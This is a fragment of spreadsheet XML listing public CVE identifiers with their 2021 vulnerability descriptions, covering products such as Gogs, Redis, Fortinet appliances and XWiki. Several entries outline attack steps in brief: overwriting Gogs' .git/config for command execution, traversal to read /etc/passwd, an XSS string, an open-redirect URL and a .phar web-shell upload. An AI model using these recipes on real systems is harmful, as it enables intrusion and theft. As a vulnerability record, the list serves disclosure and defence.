    <t>CVE-2021-32542</t>
  </si>
  <si>
    <t>The parameters of the specific functions in the CTS Web trading system do not filter special characters, which allows unauthenticated attackers can remotely perform reflected XSS and obtain the usersâ€™ connection token that triggered the attack.</t>
  </si>
  <si>
    <t>CVE-2021-32543</t>
  </si>
  <si>
    <t>The CTS Web transaction system related to authentication management is implemented incorrectly. After login, remote attackers can manipulate cookies to access other accounts and trade in the stock market with spoofed identity.</t>
  </si>
  <si>
    <t>CVE-2021-32544</t>
  </si>
  <si>
    <t>Special characters of IGT search function in igt+ are not filtered in specific fields, which allow remote authenticated attackers can inject malicious JavaScript and carry out DOM-based XSS (Cross-site scripting) attacks.</t>
  </si>
  <si>
    <t>CVE-2021-32545</t>
  </si>
  <si>
    <t>Pexip Infinity before 26 allows remote denial of service because of missing RTMP input validation.</t>
  </si>
  <si>
    <t>CVE-2021-32546</t>
  </si>
  <si>
    <t>Missing input validation in internal/db/repo_editor.go in Gogs before 0.12.8 allows an attacker to execute code remotely. An unprivileged attacker (registered user) can overwrite the Git configuration in his repository. This leads to Remote Command Execution, because that configuration can contain an option such as sshCommand, which is executed when a master branch is a remote branch (using an ssh:// URI). The remote branch can also be configured by editing the Git configuration file. One can create a new file in a new repository, using the GUI, with "\" as its name, and then rename this file to .git/config with the custom configuration content (and then save it).</t>
  </si>
  <si>
    <t>CVE-2021-32547</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-lts package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32548</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-8 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32549</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-13 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32550</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-14 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32551</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-15 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32552</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-16 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32553</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the openjdk-17 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32554</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32555</t>
  </si>
  <si>
    <t>It was discovered that read_file() in apport/hookutils.py would follow symbolic links or open FIFOs. When this function is used by the xorg-hwe-18.04 package apport hooks, it could expose private data to other local users.</t>
  </si>
  <si>
    <t>CVE-2021-32556</t>
  </si>
  <si>
    <t>It was discovered that the get_modified_conffiles() function in backends/packaging-apt-dpkg.py allowed injecting modified package names in a manner that would confuse the dpkg(1) call.</t>
  </si>
  <si>
    <t>CVE-2021-32557</t>
  </si>
  <si>
    <t>It was discovered that the process_report() function in data/whoopsie-upload-all allowed arbitrary file writes via symlinks.</t>
  </si>
  <si>
    <t>CVE-2021-32558</t>
  </si>
  <si>
    <t>An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.</t>
  </si>
  <si>
    <t>CVE-2021-32559</t>
  </si>
  <si>
    <t>An integer overflow exists in pywin32 prior to version b301 when adding an access control entry (ACE) to an access control list (ACL) that would cause the size to be greater than 65535 bytes. An attacker who successfully exploited this vulnerability could crash the vulnerable process.</t>
  </si>
  <si>
    <t>CVE-2021-3256</t>
  </si>
  <si>
    <t>KuaiFanCMS V5.x contains an arbitrary file read vulnerability in the html_url parameter of the chakanhtml.module.php file.</t>
  </si>
  <si>
    <t>CVE-2021-32560</t>
  </si>
  <si>
    <t>The Logging subsystem in OctoPrint before 1.6.0 has incorrect access control because it attempts to manage files that are not *.log files.</t>
  </si>
  <si>
    <t>CVE-2021-32561</t>
  </si>
  <si>
    <t>OctoPrint before 1.6.0 allows XSS because API error messages include the values of input parameters.</t>
  </si>
  <si>
    <t>CVE-2021-32563</t>
  </si>
  <si>
    <t>An issue was discovered in Thunar before 4.16.7 and 4.17.x before 4.17.2. When called with a regular file as a command-line argument, it delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution.</t>
  </si>
  <si>
    <t>CVE-2021-32565</t>
  </si>
  <si>
    <t>Invalid values in the Content-Length header sent to Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-32566</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in HTTP/2 of Apache Traffic Server allows an attacker to DOS the server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-32567</t>
  </si>
  <si>
    <t>CVE-2021-32568</t>
  </si>
  <si>
    <t>mrdoc is vulnerable to Deserialization of Untrusted Data</t>
  </si>
  <si>
    <t>CVE-2021-32569</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** In OSS-RC systems of the release 18B and older customer documentation browsing libraries under ALEX are subject to Cross-Site Scripting. This problem is completely resolved in new Ericsson library browsing tool ELEX used in systems like Ericsson Network Manager. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.</t>
  </si>
  <si>
    <t>CVE-2021-32570</t>
  </si>
  <si>
    <t>In Ericsson Network Manager (ENM) releases before 21.2, users belonging to the same AMOS authorization group can retrieve the data from certain log files. All AMOS users are considered to be highly privileged users in ENM system and all must be previously defined and authorized by the Security Administrator. Those users can access some log’s files, under a common path, and read information stored in the log’s files in order to conduct privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-32571</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** In OSS-RC systems of the release 18B and older during data migration procedures certain files containing usernames and passwords are left in the system undeleted but in folders accessible by top privileged accounts only. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.</t>
  </si>
  <si>
    <t>CVE-2021-32572</t>
  </si>
  <si>
    <t>Speco Web Viewer through 2021-05-12 allows Directory Traversal via GET request for a URI with /.. at the beginning, as demonstrated by reading the /etc/passwd file.</t>
  </si>
  <si>
    <t>CVE-2021-32573</t>
  </si>
  <si>
    <t>** DISPUTED ** The express-cart package through 1.1.10 for Node.js allows Reflected XSS (for an admin) via a user input field for product options. NOTE: the vendor states that this "would rely on an admin hacking his/her own website."</t>
  </si>
  <si>
    <t>CVE-2021-32574</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise 1.3.0 through 1.10.0 Envoy proxy TLS configuration does not validate destination service identity in the encoded subject alternative name. Fixed in 1.8.14, 1.9.8, and 1.10.1.</t>
  </si>
  <si>
    <t>CVE-2021-32575</t>
  </si>
  <si>
    <t>HashiCorp Nomad and Nomad Enterprise up to version 1.0.4 bridge networking mode allows ARP spoofing from other bridged tasks on the same node. Fixed in 0.12.12, 1.0.5, and 1.1.0 RC1.</t>
  </si>
  <si>
    <t>CVE-2021-32576</t>
  </si>
  <si>
    <t>Acronis True Image prior to 2021 Update 4 for Windows allowed local privilege escalation due to improper soft link handling (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-32577</t>
  </si>
  <si>
    <t>Acronis True Image prior to 2021 Update 5 for Windows allowed local privilege escalation due to insecure folder permissions.</t>
  </si>
  <si>
    <t>CVE-2021-32578</t>
  </si>
  <si>
    <t>Acronis True Image prior to 2021 Update 4 for Windows allowed local privilege escalation due to improper soft link handling (issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-32579</t>
  </si>
  <si>
    <t>Acronis True Image prior to 2021 Update 4 for Windows and Acronis True Image prior to 2021 Update 5 for macOS allowed an unauthenticated attacker (who has a local code execution ability) to tamper with the micro-service API.</t>
  </si>
  <si>
    <t>CVE-2021-3258</t>
  </si>
  <si>
    <t>Question2Answer Q2A Ultimate SEO Version 1.3 is affected by cross-site scripting (XSS), which may lead to arbitrary remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-32580</t>
  </si>
  <si>
    <t>Acronis True Image prior to 2021 Update 4 for Windows allowed local privilege escalation due to DLL hijacking.</t>
  </si>
  <si>
    <t>CVE-2021-32581</t>
  </si>
  <si>
    <t>Acronis True Image prior to 2021 Update 4 for Windows, Acronis True Image prior to 2021 Update 5 for Mac, Acronis Agent prior to build 26653, Acronis Cyber Protect prior to build 27009 did not implement SSL certificate validation.</t>
  </si>
  <si>
    <t>CVE-2021-32582</t>
  </si>
  <si>
    <t>An issue was discovered in ConnectWise Automate before 2021.5. A blind SQL injection vulnerability exists in core agent inventory communication that can enable an attacker to extract database information or administrative credentials from an instance via crafted monitor status responses.</t>
  </si>
  <si>
    <t>CVE-2021-32585</t>
  </si>
  <si>
    <t>An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiWAN before 4.5.9 may allow an attacker to perform a stored cross-site scripting attack via specifically crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-32586</t>
  </si>
  <si>
    <t>An improper input validation vulnerability in the web server CGI facilities of FortiMail before 7.0.1 may allow an unauthenticated attacker to alter the environment of the underlying script interpreter via specifically crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-32587</t>
  </si>
  <si>
    <t>An improper access control vulnerability in FortiManager and FortiAnalyzer GUI interface 7.0.0, 6.4.5 and below, 6.2.8 and below, 6.0.11 and below, 5.6.11 and below may allow a remote and authenticated attacker with restricted user profile to retrieve the list of administrative users of other ADOMs and their related configuration.</t>
  </si>
  <si>
    <t>CVE-2021-32588</t>
  </si>
  <si>
    <t>A use of hard-coded credentials (CWE-798) vulnerability in FortiPortal versions 5.2.5 and below, 5.3.5 and below, 6.0.4 and below, versions 5.1.x and 5.0.x may allow a remote and unauthenticated attacker to execute unauthorized commands as root by uploading and deploying malicious web application archive files using the default hard-coded Tomcat Manager username and password.</t>
  </si>
  <si>
    <t>CVE-2021-32590</t>
  </si>
  <si>
    <t>Multiple improper neutralization of special elements used in an SQL command vulnerabilities in FortiPortal 6.0.0 through 6.0.4, 5.3.0 through 5.3.5, 5.2.0 through 5.2.5, and 4.2.2 and earlier may allow an attacker with regular user's privileges to execute arbitrary commands on the underlying SQL database via specifically crafted HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-32591</t>
  </si>
  <si>
    <t>A missing cryptographic steps vulnerability in the function that encrypts users' LDAP and RADIUS credentials in FortiSandbox before 4.0.1, FortiWeb before 6.3.12, FortiADC before 6.2.1, FortiMail 7.0.1 and earlier may allow an attacker in possession of the password store to compromise the confidentiality of the encrypted secrets.</t>
  </si>
  <si>
    <t>CVE-2021-32592</t>
  </si>
  <si>
    <t>An unsafe search path vulnerability in FortiClientWindows 7.0.0, 6.4.6 and below, 6.2.x, 6.0.x and FortiClientEMS 7.0.0, 6.4.6 and below, 6.2.x, 6.0.x may allow an attacker to perform a DLL Hijack attack on affected devices via a malicious OpenSSL engine library in the search path.</t>
  </si>
  <si>
    <t>CVE-2021-32593</t>
  </si>
  <si>
    <t>A use of a broken or risky cryptographic algorithm vulnerability [CWE-327] in the Dynamic Tunnel Protocol of FortiWAN before 4.5.9 may allow an unauthenticated remote attacker to decrypt and forge protocol communication messages.</t>
  </si>
  <si>
    <t>CVE-2021-32594</t>
  </si>
  <si>
    <t>An unrestricted file upload vulnerability in the web interface of FortiPortal 6.0.0 through 6.0.4, 5.3.0 through 5.3.5, 5.2.0 through 5.2.5, and 4.2.2 and earlier may allow a low-privileged user to potentially tamper with the underlying system's files via the upload of specifically crafted files.</t>
  </si>
  <si>
    <t>CVE-2021-32595</t>
  </si>
  <si>
    <t>Multiple uncontrolled resource consumption vulnerabilities in the web interface of FortiPortal before 6.0.6 may allow a single low-privileged user to induce a denial of service via multiple HTTP requests.</t>
  </si>
  <si>
    <t>CVE-2021-32596</t>
  </si>
  <si>
    <t>A use of one-way hash with a predictable salt vulnerability in the password storing mechanism of FortiPortal 6.0.0 through 6.04 may allow an attacker already in possession of the password store to decrypt the passwords by means of precomputed tables.</t>
  </si>
  <si>
    <t>CVE-2021-32597</t>
  </si>
  <si>
    <t>Multiple improper neutralization of input during web page generation (CWE-79) in FortiManager and FortiAnalyzer versions 7.0.0, 6.4.5 and below, 6.2.7 and below user interface, may allow a remote authenticated attacker to perform a Stored Cross Site Scripting attack (XSS) by injecting malicious payload in GET parameters.</t>
  </si>
  <si>
    <t>CVE-2021-32598</t>
  </si>
  <si>
    <t>An improper neutralization of CRLF sequences in HTTP headers ('HTTP Response Splitting') vulnerability In FortiManager and FortiAnalyzer GUI 7.0.0, 6.4.6 and below, 6.2.8 and below, 6.0.11 and below, 5.6.11 and below may allow an authenticated and remote attacker to perform an HTTP request splitting attack which gives attackers control of the remaining headers and body of the response.</t>
  </si>
  <si>
    <t>CVE-2021-32600</t>
  </si>
  <si>
    <t>An exposure of sensitive information to an unauthorized actor vulnerability in FortiOS CLI 7.0.0, 6.4.0 through 6.4.6, 6.2.0 through 6.2.9, 6.0.x and 5.6.x may allow a local and authenticated user assigned to a specific VDOM to retrieve other VDOMs information such as the admin account list and the network interface list.</t>
  </si>
  <si>
    <t>CVE-2021-32602</t>
  </si>
  <si>
    <t>An improper neutralization of input during web page generation vulnerability (CWE-79) in FortiPortal GUI 6.0.4 and below, 5.3.6 and below, 5.2.6 and below, 5.1.2 and below, 5.0.3 and below, 4.2.2 and below, 4.1.2 and below, 4.0.4 and below may allow a remote and unauthenticated attacker to perform an XSS attack via sending a crafted request with an invalid lang parameter or with an invalid org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE value.</t>
  </si>
  <si>
    <t>CVE-2021-32603</t>
  </si>
  <si>
    <t>A server-side request forgery (SSRF) (CWE-918) vulnerability in FortiManager and FortiAnalyser GUI 7.0.0, 6.4.5 and below, 6.2.7 and below, 6.0.11 and below, 5.6.11 and below may allow a remote and authenticated attacker to access unauthorized files and services on the system via specifically crafted web requests.</t>
  </si>
  <si>
    <t>CVE-2021-32604</t>
  </si>
  <si>
    <t>Share/IncomingWizard.htm in SolarWinds Serv-U before 15.2.3 mishandles the user-supplied SenderEmail parameter, aka "Share URL XSS."</t>
  </si>
  <si>
    <t>CVE-2021-32605</t>
  </si>
  <si>
    <t>zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block.</t>
  </si>
  <si>
    <t>CVE-2021-32606</t>
  </si>
  <si>
    <t>In the Linux kernel 5.11 through 5.12.2, isotp_setsockopt in net/can/isotp.c allows privilege escalation to root by leveraging a use-after-free. (This does not affect earlier versions that lack CAN ISOTP SF_BROADCAST support.)</t>
  </si>
  <si>
    <t>CVE-2021-32607</t>
  </si>
  <si>
    <t>An issue was discovered in Smartstore (aka SmartStoreNET) through 4.1.1. Views/PrivateMessages/View.cshtml does not call HtmlUtils.SanitizeHtml on a private message.</t>
  </si>
  <si>
    <t>CVE-2021-32608</t>
  </si>
  <si>
    <t>An issue was discovered in Smartstore (aka SmartStoreNET) through 4.1.1. Views/Boards/Partials/_ForumPost.cshtml does not call HtmlUtils.SanitizeHtml on certain text for a forum post.</t>
  </si>
  <si>
    <t>CVE-2021-32609</t>
  </si>
  <si>
    <t>Apache Superset up to and including 1.1 does not sanitize titles correctly on the Explore page. This allows an attacker with Explore access to save a chart with a malicious title, injecting html (including scripts) into the page.</t>
  </si>
  <si>
    <t>CVE-2021-32610</t>
  </si>
  <si>
    <t>In Archive_Tar before 1.4.14, symlinks can refer to targets outside of the extracted archive, a different vulnerability than CVE-2020-36193.</t>
  </si>
  <si>
    <t>CVE-2021-32611</t>
  </si>
  <si>
    <t>A NULL pointer dereference vulnerability exists in eXcall_api.c in Antisip eXosip2 through 5.2.0 when handling certain 3xx redirect responses.</t>
  </si>
  <si>
    <t>CVE-2021-32612</t>
  </si>
  <si>
    <t>The VeryFitPro (com.veryfit2hr.second) application 3.2.8 for Android does all communication with the backend API over cleartext HTTP. This includes logins, registrations, and password change requests. This allows information theft and account takeover via network sniffing.</t>
  </si>
  <si>
    <t>CVE-2021-32613</t>
  </si>
  <si>
    <t>In radare2 through 5.3.0 there is a double free vulnerability in the pyc parse via a crafted file which can lead to DoS.</t>
  </si>
  <si>
    <t>CVE-2021-32614</t>
  </si>
  <si>
    <t>A flaw was found in dmg2img through 20170502. fill_mishblk() does not check the length of the read buffer, and copy 0xCC bytes from it. The length of the buffer is controlled by an attacker. By providing a length smaller than 0xCC, memcpy reaches out of the malloc'ed bound. This possibly leads to memory layout information leaking in the data. This might be used in a chain of vulnerability in order to reach code execution.</t>
  </si>
  <si>
    <t>CVE-2021-32615</t>
  </si>
  <si>
    <t>Piwigo 11.4.0 allows admin/user_list_backend.php order[0][dir] SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2021-32616</t>
  </si>
  <si>
    <t>1CDN is open-source file sharing software. In 1CDN before commit f88a2730fa50fc2c2aeab09011f6f142fd90ec25, there is a basic cross-site scripting vulnerability that allows an attacker to inject /&lt;script&gt;//code&lt;/script&gt; and execute JavaScript code on the client side.</t>
  </si>
  <si>
    <t>CVE-2021-32617</t>
  </si>
  <si>
    <t>Exiv2 is a command-line utility and C++ library for reading, writing, deleting, and modifying the metadata of image files. An inefficient algorithm (quadratic complexity) was found in Exiv2 versions v0.27.3 and earlier. The inefficient algorithm is triggered when Exiv2 is used to write metadata into a crafted image file. An attacker could potentially exploit the vulnerability to cause a denial of service, if they can trick the victim into running Exiv2 on a crafted image file. The bug is fixed in version v0.27.4. Note that this bug is only triggered when _writing_ the metadata, which is a less frequently used Exiv2 operation than _reading_ the metadata. For example, to trigger the bug in the Exiv2 command-line application, you need to add an extra command-line argument such as `rm`.</t>
  </si>
  <si>
    <t>CVE-2021-32618</t>
  </si>
  <si>
    <t>The Python "Flask-Security-Too" package is used for adding security features to your Flask application. It is an is an independently maintained version of Flask-Security based on the 3.0.0 version of Flask-Security. All versions of Flask-Security-Too allow redirects after many successful views (e.g. /login) by honoring the ?next query param. There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com will pass FS's relative URL check however many browsers will gladly convert this to http://github.com. Thus an attacker could send such a link to an unwitting user, using a legitimate site and have it redirect to whatever site they want. This is considered a low severity due to the fact that if Werkzeug is used (which is very common with Flask applications) as the WSGI layer, it by default ALWAYS ensures that the Location header is absolute - thus making this attack vector mute. It is possible for application writers to modify this default behavior by setting the 'autocorrect_location_header=False`.</t>
  </si>
  <si>
    <t>CVE-2021-32619</t>
  </si>
  <si>
    <t>Deno is a runtime for JavaScript and TypeScript that uses V8 and is built in Rust. In Deno versions 1.5.0 to 1.10.1, modules that are dynamically imported through `import()` or `new Worker` might have been able to bypass network and file system permission checks when statically importing other modules. The vulnerability has been patched in Deno release 1.10.2.</t>
  </si>
  <si>
    <t>CVE-2021-32620</t>
  </si>
  <si>
    <t>XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 11.10.13, 12.6.7, and 12.10.2, a user disabled on a wiki using email verification for registration canouldre-activate themself by using the activation link provided for his registration. The problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0. It is possible to workaround the issue by resetting the `validkey` property of the disabled XWiki users. This can be done by editing the user profile with object editor.</t>
  </si>
  <si>
    <t>CVE-2021-32621</t>
  </si>
  <si>
    <t>XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions prior to 12.6.7 and 12.10.3, a user without Script or Programming right is able to execute script requiring privileges by editing gadget titles in the dashboard. The issue has been patched in XWiki 12.6.7, 12.10.3 and 13.0RC1.</t>
  </si>
  <si>
    <t>CVE-2021-32622</t>
  </si>
  <si>
    <t>Matrix-React-SDK is a react-based SDK for inserting a Matrix chat/voip client into a web page. Before version 3.21.0, when uploading a file, the local file preview can lead to execution of scripts embedded in the uploaded file. This can only occur after several user interactions to open the preview in a separate tab. This only impacts the local user while in the process of uploading. It cannot be exploited remotely or by other users. This vulnerability is patched in version 3.21.0.</t>
  </si>
  <si>
    <t>CVE-2021-32623</t>
  </si>
  <si>
    <t>Opencast is a free and open source solution for automated video capture and distribution. Versions of Opencast prior to 9.6 are vulnerable to the billion laughs attack, which allows an attacker to easily execute a (seemingly permanent) denial of service attack, essentially taking down Opencast using a single HTTP request. To exploit this, users need to have ingest privileges, limiting the group of potential attackers The problem has been fixed in Opencast 9.6. There is no known workaround for this issue.</t>
  </si>
  <si>
    <t>CVE-2021-32624</t>
  </si>
  <si>
    <t>Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control. This is an access control related oracle attack in that the attack method guides an attacker during their attempt to reveal information they do not have access to. The complexity of completing the attack is limited by some length-dependent behaviors and the fidelity of the exposed information. Under some circumstances, field values or field value meta data can be determined, despite the field or list having `read` access control configured. If you use private fields or lists, you may be impacted. No patches exist at this time. There are no workarounds at this time</t>
  </si>
  <si>
    <t>CVE-2021-32625</t>
  </si>
  <si>
    <t>Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker. An integer overflow bug in Redis version 6.0 or newer, could be exploited using the STRALGO LCS command to corrupt the heap and potentially result with remote code execution. This is a result of an incomplete fix by CVE-2021-29477. The problem is fixed in version 6.2.4 and 6.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to use ACL configuration to prevent clients from using the STRALGO LCS command. On 64 bit systems which have the fixes of CVE-2021-29477 (6.2.3 or 6.0.13), it is sufficient to make sure that the proto-max-bulk-len config parameter is smaller than 2GB (default is 512MB).</t>
  </si>
  <si>
    <t>CVE-2021-32626</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. In affected versions specially crafted Lua scripts executing in Redis can cause the heap-based Lua stack to be overflowed, due to incomplete checks for this condition. This can result with heap corruption and potentially remote code execution. This problem exists in all versions of Redis with Lua scripting support, starting from 2.6. The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14. For users unable to update an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands.</t>
  </si>
  <si>
    <t>CVE-2021-32627</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. In affected versions an integer overflow bug in Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves changing the default proto-max-bulk-len and client-query-buffer-limit configuration parameters to very large values and constructing specially crafted very large stream elements. The problem is fixed in Redis 6.2.6, 6.0.16 and 5.0.14. For users unable to upgrade an additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the proto-max-bulk-len configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</t>
  </si>
  <si>
    <t>CVE-2021-32628</t>
  </si>
  <si>
    <t>Redis is an open source, in-memory database that persists on disk. An integer overflow bug in the ziplist data structure used by all versions of Redis can be exploited to corrupt the heap and potentially result with remote code execution. The vulnerability involves modifying the default ziplist configuration parameters (hash-max-ziplist-entries, hash-max-ziplist-value, zset-max-ziplist-entries or zset-max-ziplist-value) to a very large value, and then constructing specially crafted commands to create very large ziplists. The problem is fixed in Redis versions 6.2.6, 6.0.16, 5.0.14. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from modifying the above configuration parameters. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</t>
  </si>
  <si>
    <t>CVE-2021-32629</t>
  </si>
  <si>
    <t>Cranelift is an open-source code generator maintained by Bytecode Alliance. It translates a target-independent intermediate representation into executable machine code. There is a bug in 0.73 of the Cranelift x64 backend that can create a scenario that could result in a potential sandbox escape in a Wasm program. This bug was introduced in the new backend on 2020-09-08 and first included in a release on 2020-09-30, but the new backend was not the default prior to 0.73. The recently-released version 0.73 with default settings, and prior versions with an explicit build flag to select the new backend, are vulnerable. The bug in question performs a sign-extend instead of a zero-extend on a value loaded from the stack, under a specific set of circumstances. If those circumstances occur, the bug could allow access to memory addresses upto 2GiB before the start of the Wasm program heap. If the heap bound is larger than 2GiB, then it would be possible to read memory from a computable range dependent on the size of the heaps bound. The impact of this bug is highly dependent on heap implementation, specifically: * if the heap has bounds checks, and * does not rely exclusively on guard pages, and * the heap bound is 2GiB or smaller * then this bug cannot be used to reach memory from another Wasm program heap. The impact of the vulnerability is mitigated if there is no memory mapped in the range accessible using this bug, for example, if there is a 2 GiB guard region before the Wasm program heap. The bug in question performs a sign-extend instead of a zero-extend on a value loaded from the stack, when the register allocator reloads a spilled integer value narrower than 64 bits. This interacts poorly with another optimization: the instruction selector elides a 32-to-64-bit zero-extend operator when we know that an instruction producing a 32-bit value actually zeros the upper 32 bits of its destination register. Hence, we rely on these zeroed bits, but the type of the value is still i32, and the spill/reload reconstitutes those bits as the sign extension of the i32â€™s MSB. The issue would thus occur when: * An i32 value in a Wasm program is greater than or equal to 0x8000_0000; * The value is spilled and reloaded by the register allocator due to high register pressure in the program between the valueâ€™s definition and its use; * The value is produced by an instruction that we know to be â€œspecialâ€? in that it zeroes the upper 32 bits of its destination: add, sub, mul, and, or; * The value is then zero-extended to 64 bits in the Wasm program; * The resulting 64-bit value is used. Under these circumstances there is a potential sandbox escape when the i32 value is a pointer. The usual code emitted for heap accesses zero-extends the Wasm heap address, adds it to a 64-bit heap base, and accesses the resulting address. If the zero-extend becomes a sign-extend, the program could reach backward and access memory up to 2GiB before the start of its heap. In addition to assessing the nature of the code generation bug in Cranelift, we have also determined that under specific circumstances, both Lucet and Wasmtime using this version of Cranelift may be exploitable. See referenced GitHub Advisory for more details.</t>
  </si>
  <si>
    <t>CVE-2021-32630</t>
  </si>
  <si>
    <t>Admidio is a free, open source user management system for websites of organizations and groups. In Admidio before version 4.0.4, there is an authenticated RCE via .phar file upload. A php web shell can be uploaded via the Documents &amp; Files upload feature. Someone with upload permissions could rename the php shell with a .phar extension, visit the file, triggering the payload for a reverse/bind shell. This can be mitigated by excluding a .phar file extension to be uploaded (like you did with .php .phtml .php5 etc). The vulnerability is patched in version 4.0.4.</t>
  </si>
  <si>
    <t>CVE-2021-32631</t>
  </si>
  <si>
    <t>Common is a package of common modules that can be accessed by NIMBLE services. Common before commit number 3b96cb0293d3443b870351945f41d7d55cb34b53 did not properly verify the signature of JSON Web Tokens. This allows someone to forge a valid JWT. Being able to forge JWTs may lead to authentication bypasses. Commit number 3b96cb0293d3443b870351945f41d7d55cb34b53 contains a patch for the issue. As a workaround, one may use the parseClaimsJws method to correctly verify the signature of a JWT.</t>
  </si>
  <si>
    <t>CVE-2021-32632</t>
  </si>
  <si>
    <t>Pajbot is a Twitch chat bot. Pajbot versions prior to 1.52 are vulnerable to cross-site request forgery (CSRF). Hosters of the bot should upgrade to `v1.52` or `stable` to install the patch or, as a workaround, can add one modern dependency.</t>
  </si>
  <si>
    <t>CVE-2021-32633</t>
  </si>
  <si>
    <t>Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through the web, but sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk from this vulnerability. The problem has been fixed in Zope 5.2 and 4.6. As a workaround, a site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only.</t>
  </si>
  <si>
    <t>CVE-2021-32634</t>
  </si>
  <si>
    <t>Emissary is a distributed, peer-to-peer, data-driven workflow framework. Emissary 6.4.0 is vulnerable to Unsafe Deserialization of post-authenticated requests to the [`WorkSpaceClientEnqueue.action`](https://github.com/NationalSecurityAgency/emissary/blob/30c54ef16c6eb6ed09604a929939fb9f66868382/src/main/java/emissary/server/mvc/internal/WorkSpaceClientEnqueueAction.java) REST endpoint. This issue may lead to post-auth Remote Code Execution. This issue has been patched in version 6.5.0. As a workaround, one can disable network access to Emissary from untrusted sources.</t>
  </si>
  <si>
    <t>CVE-2021-32635</t>
  </si>
  <si>
